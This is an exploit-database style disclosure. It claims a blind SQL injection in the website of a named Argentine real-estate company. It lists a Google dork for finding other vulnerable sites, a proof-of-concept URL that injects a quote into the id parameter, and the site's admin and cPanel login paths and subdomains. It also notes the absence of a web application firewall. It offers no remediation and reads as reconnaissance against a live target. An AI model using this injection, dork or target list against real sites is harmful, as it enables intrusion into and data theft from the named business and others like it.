Exploit Title: Cabrera Propiedades (Blind SQL Injection)
Discovered By: intrackeable
Date: 14/09/2019
Tested On: Linux Kubuntu
Google Dork: "inurl:php?id= site:ar intext:propiedades"
Category: WebApps
Vulnerability Type: CWE-89
Vendor Home Page: cabrerapropiedades.com.ar
PoC: http://cabrerapropiedades.com.ar/ficha_emp.php?id=15%27
Admin Login Paths:
http://www.cabrerapropiedades.com.ar/adm/
https://www.cabrerapropiedades.com.ar:2083/
https://www.cabrerapropiedades.com.ar:2096/
Subdomains:
http://localhost.cabrerapropiedades.com.ar
http://ftp.cabrerapropiedades.com.ar
WAF Detection:
No WAF detected by the generic detection.